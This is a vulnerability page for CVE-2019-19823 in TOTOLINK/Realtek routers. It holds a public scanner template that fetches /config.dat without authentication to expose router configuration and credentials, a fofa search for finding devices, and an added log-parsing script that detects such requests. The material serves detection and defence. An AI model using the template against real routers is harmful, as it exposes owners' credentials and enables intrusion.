A certain router administration interface using Realtek APMIB (e.g., on TOTOLINK models) allows unauthenticated remote attackers to disclose the entire router configuration, including sensitive credentials, via accessing the "config.dat" file. Affected devices include TOTOLINK A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, N100RE through 3.4.0, and other Realtek SDK-based devices.
PoC code [public]
id: CVE-2019-19823
info:
  name: TOTOLINK/Realtek Routers - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    A certain router administration interface using Realtek APMIB (e.g., on TOTOLINK models) allows unauthenticated remote attackers to disclose the entire router configuration, including sensitive credentials, via accessing the "config.dat" file. Affected devices include TOTOLINK A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, N100RE through 3.4.0, and other Realtek SDK-based devices.
  reference:
    - http://packetstormsecurity.com/files/156083/Realtek-SDK-Information-Disclosure-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-19822
  classification:
    cve-id: CVE-2019-19823
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-306
  metadata:
    verified: true
    max-requests: 1
    vendor: totolink
    fofa-query: title="totolink"
  tags: cve,cve2019,totolink,realtek,exposure,config,boa
http:
  - method: GET
    path:
      - "{{BaseURL}}/config.dat"
    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/plain")'
          - 'contains(to_lower(server), "boa")'
          - 'contains(accept_ranges, "bytes")'
          - 'status_code == 200'
        condition: and
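For the defensive side, the following added example (not part of the template or the original page) scans access logs for requests to the "config.dat" path named in the advisory and separates served responses from rejected probes. It assumes a reverse proxy or gateway in front of the management interface that writes Combined Log Format; the function names and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from posixpath import normpath
from urllib.parse import unquote

# Combined Log Format: ip - user [time] "METHOD target PROTO" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TARGET_PATH = "/config.dat"  # path named in the advisory

def normalize(target: str) -> str:
    """Reduce a request target to a canonical lower-case path for comparison."""
    path = unquote(target.split("?", 1)[0])          # drop query, decode %2E etc.
    return normpath("/" + path.lstrip("/")).lower()  # collapse //, /./ and /../

def find_config_requests(lines):
    """Return {source_ip: [(timestamp, status, bytes, disclosed)]} for config.dat hits."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or normalize(m["target"]) != TARGET_PATH:
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        # A 200 with a non-empty body means the file was actually served.
        disclosed = status == 200 and size > 0
        hits[m["ip"]].append((m["ts"], status, size, disclosed))
    return dict(hits)

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /config.dat HTTP/1.1" 200 20480 "-" "curl/8.0"',
    '198.51.100.7 - - [12/Mar/2024:10:01:05 +0000] "GET /index.htm HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.9 - - [12/Mar/2024:11:15:40 +0000] "GET //config%2Edat?x=1 HTTP/1.1" 200 20480 "-" "-"',
    '203.0.113.20 - - [12/Mar/2024:11:20:00 +0000] "GET /config.dat HTTP/1.1" 401 0 "-" "-"',
    '192.0.2.44 - - [12/Mar/2024:12:00:00 +0000] "GET /backup/config.dat.txt HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, events in find_config_requests(SAMPLE_LOG).items():
        for ts, status, size, disclosed in events:
            verdict = "CONFIG DISCLOSED" if disclosed else "probe"
            print(f"{ip} {ts} status={status} bytes={size} {verdict}")
```

Any entry flagged as disclosed means the credentials stored in that configuration should be treated as exposed and rotated.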